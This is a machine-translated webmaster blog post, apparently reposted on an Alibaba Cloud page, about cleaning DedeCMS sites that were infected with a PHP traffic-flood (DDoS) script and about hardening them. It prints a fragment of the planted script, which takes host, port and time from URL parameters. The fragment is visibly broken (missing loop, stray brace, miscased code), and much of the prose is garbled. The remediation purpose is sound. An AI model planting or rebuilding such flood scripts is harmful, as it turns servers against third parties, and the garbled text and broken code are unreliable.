The solution to share the vulnerability of dedecms DDoS hanging Horse

Source: Internet
Author: User

Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest cloud host technology Hall

To the end of the year, unknowingly passed too fast, recently my several websites by the computer room of the serious warning, let me unexpectedly is, the machine room that side unexpectedly said my website was hanged the horse, the website traffic is always unceasingly to the external contract, how also thinks Impassability, the website has been running stably for several years, has never encountered has been hanged the horse this to say, So I worked for three days and three nights finally found the root of the problem, but also the title of this article "Dedecms DDoS problem-solving solution" to speak. Below I give you a detailed introduction to my solution, I hope to encounter this situation webmaster children's shoes, encountered this problem can be solved.

Dedecms is the most famous PHP open source system in China, is also I use the most of a system, simple and practical stability is the reason I used for many years, is because of dedecms open source, also led to a lot of hackers stare at this program, night and night to study dedecms loophole, also in the recent outbreak of , many dedecms sites have been hung horse, and some were warned by the computer room, heavy by the computer room forcibly closed the station, countless. I want to say is that since the problem appears we have to solve, only to solve, your site will be long-term stable development. First of all, from the characteristics of the problem with the introduction.

The characteristics of the horse: open their own web site, the way to see the source code will find their own site has been added a lot of black chain code, black chain code is the most simple and most can let AdSense see, he is nothing more than friendship link code.

Another feature is that opening the site will be 360 security tips site risk of hanging horses, this type of horse code, is generally frame code or JS code or picture code, there is a feature is that the site will suddenly not open or open slowly, check traffic will find themselves occupy a lot of traffic, That is to say, the characteristics of flow to the external contract, also known as UDP traffic contract attack. The above is the general characteristics of the horse dedecms is hanging, the following on the actual, the site was hanging horse solutions and preventive measures.

First of all the code to download the Web site to their own local, with the Sinesafe Trojan Removal Tool detected a bit, found data/cache/directory there are many script Trojan, open Trojan script found some do not know the PHP code, Put the code into the Sinesafe Trojan tool deep analysis of the characteristics of the Trojan horse found that the code is as follows:

<?php

Set_time_limit (984918);

$host = $_get[' host '];

$port = $_get[' Port '];

$exec _time = $_get[' time '];

$Sendlen = 65535;

$packets = 0;

}

echo "================================================<br>";

echo "<font color=blue>www.phpddos.com<br>";

echo "SYN Flood module <br>";

echo "Author:ybhacker<br>";

echo "WARNING: This program is offensive, only for security research and teaching purposes, the risk of conceit!</font><br>";

echo "================================================<br><br>";

echo "Attack Pack total: <font color=red><span class=\" text\ ">". $packets. "Packets </span><br><br> </font> ";

echo "Attack Total traffic: <font color=red><span class=\" text\ ">" Round (($packets *65*8)/(1024*1024), 2). " Mbps</span><br><br></font> ";

echo "Attack Total Bytes: <font color=red><span class=\" text\ ">". Time (' h:i:s '). "Bytes </span><br><br> </font> ";

echo "Packet complete at". Time (' h:i:s '). "With $packets (". Round ($packets *65*8)/(1024*1024), 2). " Mbps) packets averaging ". Round ($packets/$exec _time, 2). "PACKETS/S \ n";

?>

I found on the Internet This is a UDP traffic attack php script Trojan, this Trojan is able to run the permissions of the Web site script can achieve the effect of DDoS traffic attacks. Do not need the permissions of the server, this I just understand why the computer room said my site has been out of contract, run this script site will open slowly, my site is also in it. Since I found the problem, then I will operate, click to clear the Trojan code, all to clear. There is no unfamiliar filename under the data/cache/directory. Finally summed up a few five solutions and preventive measures.

1 dedecms Directory security settings: Data/cache/templets uploads directory settings can read and write, do not execute permissions. Include, member, plus set readable executable writable permissions, and because DEDECMS does not use stored procedures anywhere, you can disable file, execute, and so on to execute stored procedures or file operations.

2 Web Site Program security: This is also the most fundamental precautions, if the virtual space is recommended to find a professional website to do security maintenance to do Web site security, only the site is safe to bring security and stability of the customer source.

3 Program update: Open DEDECMS background To see if there are updates to the patch, if you welcome timely updates and patching, if your version is very old, I recommend reinstalling the new version, because the new version is relatively safe, there are many places and the old version of the same.

4 Admin Directory: DEDECMS Admin directory General default is Dedecms, a lot of webmaster never care about this background address, I am very responsible to tell you, the management of the directory address if it is the default of the chances that you are hanging horse is%100. It is suggested that the name of the catalogue be changed to some number plus the name of the letter symbol combination.

5 FTP Web site management password: FTP password and Web site management password is recommended to modify frequently, because many hackers are using brute force to crack the password, the password to change the complexity as far as possible doped with special matches and letters.

The above is my solution and preventive measures, villains outsmart, in fact, to solve the problem is very happy, when you solve the problem of the moment, in fact, nothing is just trivial, attitude determines everything.

This article content source server security www.sinesafe.cn A5 First welcome reprint, reprint please indicate the author and source. Thank you!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.